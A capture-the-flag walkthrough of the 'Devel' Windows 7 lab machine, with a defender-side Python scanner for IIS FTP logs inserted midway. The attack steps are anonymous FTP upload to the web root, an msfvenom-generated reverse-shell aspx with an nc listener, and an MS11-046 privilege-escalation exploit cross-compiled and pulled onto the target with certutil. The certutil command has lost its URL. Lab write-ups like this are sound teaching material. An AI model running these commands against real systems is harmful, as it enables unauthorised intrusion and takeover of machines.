nmap enumeration

nmap -A -p- -T4 -vvv -oN devel

FTP upload test

The nmap result shows that FTP allows anonymous login. Now I test whether I can upload files.

I can also do directory and file listing.

Test whether the files in FTP reflect the pages served by the web server.

The iistart.htm is also available.

Test whether a file I upload can be displayed in the web.
I create a simple .htm file that pops up a JavaScript dialog, then upload it to the FTP server.
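A defender-side check for the pattern just tested (anonymous FTP write access landing in the IIS web root). The Python below is an added example, not part of the original write-up: it scans IIS FTP W3C log lines for anonymous STOR commands that drop server-executable file types, and uses the FTP reply code to separate completed transfers from rejected attempts. The log lines are constructed (addresses from the documentation ranges), and the column layout is taken from the #Fields header so the parser follows whatever fields the server actually logs.

```python
"""Flag anonymous FTP uploads of server-executable files in IIS FTP W3C logs.

Added example for this write-up (not the author's code). SAMPLE_LOG is a
constructed log in the W3C extended format IIS FTP writes; the field names
come from its #Fields header, so the parser adapts to the configured columns.
"""
import posixpath
from dataclasses import dataclass
from typing import Iterator

# File types the IIS handler pipeline will execute if they land in the web root.
EXECUTABLE_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll"}

# Constructed sample log (not a real capture). 192.0.2.x / 198.51.100.x are
# documentation ranges; file names mirror the write-up's test and payload.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 - 198.51.100.20 21 ControlChannelOpened - 0
2024-01-01 10:00:02 192.0.2.10 - 198.51.100.20 21 USER anonymous 331
2024-01-01 10:00:03 192.0.2.10 anonymous 198.51.100.20 21 PASS *** 230
2024-01-01 10:00:05 192.0.2.10 anonymous 198.51.100.20 21 RETR /iisstart.htm 226
2024-01-01 10:00:09 192.0.2.10 anonymous 198.51.100.20 21 STOR /test.htm 226
2024-01-01 10:00:15 192.0.2.10 anonymous 198.51.100.20 21 STOR /devel.aspx 226
2024-01-01 10:01:00 192.0.2.11 anonymous 198.51.100.20 21 STOR /shell.aspx 550
2024-01-01 10:02:00 192.0.2.12 babis 198.51.100.20 21 STOR /report.aspx 226
"""


@dataclass
class Finding:
    time: str
    client_ip: str
    path: str
    status: int
    completed: bool  # a 2xx FTP reply means the transfer actually finished


def parse_w3c(log_text: str) -> Iterator[dict]:
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Version, #Date)
        if fields is None:
            raise ValueError("log record appears before any #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip truncated or corrupt lines rather than mis-map columns
        yield dict(zip(fields, values))


def find_anonymous_executable_uploads(log_text: str) -> list[Finding]:
    """Return anonymous STOR records whose target is an executable file type."""
    findings = []
    for rec in parse_w3c(log_text):
        if rec.get("cs-method") != "STOR":
            continue
        if rec.get("cs-username", "-").lower() != "anonymous":
            continue
        ext = posixpath.splitext(rec.get("cs-uri-stem", ""))[1].lower()
        if ext not in EXECUTABLE_EXTENSIONS:
            continue
        status = int(rec.get("sc-status", "0"))
        findings.append(Finding(
            time=f"{rec['date']} {rec['time']}",
            client_ip=rec["c-ip"],
            path=rec["cs-uri-stem"],
            status=status,
            completed=200 <= status < 300,
        ))
    return findings


if __name__ == "__main__":
    for f in find_anonymous_executable_uploads(SAMPLE_LOG):
        state = "COMPLETED" if f.completed else "attempted"
        print(f"{f.time} {f.client_ip} {state} upload of {f.path} (sc-status {f.status})")
```

The benign .htm test upload and the authenticated user's upload are deliberately not flagged, so the rule isolates the one condition that turns an FTP misconfiguration into code execution: an unauthenticated client writing a file the web server will execute.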


Generate a reverse shell aspx

msfvenom -p windows/shell_reverse_tcp lhost= lport=4444 -f aspx -o devel.aspx

This file is then uploaded to the FTP server.

Get the windows shell

nc -lvnp 4444

With the browser go to to initiate the reverse connection.

Understand the system and get the exploit


6.1.7600 N/A Build 7600 is the version. After searching and testing a few exploits, this one works the best: https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c. The conditions for using this exploit are a valid logon, which I already have, and the ability to execute the exploit locally.

Also, although the virtual machine is 64-bit, the Windows 7 installation is a 32-bit version.

Compile the source code

I will compile the source code locally on Linux, then set up an HTTP server with Python and use certutil on Devel to download the compiled binary.

A cross compiler is required to build the Windows binary in a Linux environment.
apt install mingw-w64

I need to compile the exploit as a 32-bit binary in order to run it on Devel.
i686-w64-mingw32-gcc 40564.c -o devel.exe -lws2_32

Pwn devel

Set up an HTTP server on my Kali machine
python3 -m http.server 80

Then on Devel use certutil -urlcache -f C:\Users\Public\Downloads\devel.exe


From here I can get both the babis user's and the Administrator's flags.

Clean up

After I have got the flags, I exit the escalated environment to revert back to the original user, then delete the devel.exe that I downloaded.



Although this is an easy machine, it provides good practice in doing the hack manually. There are other solutions which use Metasploit's exploits, but I wanted to see whether a manual way is possible. I also wanted to cross compile another cpp file to test whether the exploit works on Devel. Until next time.


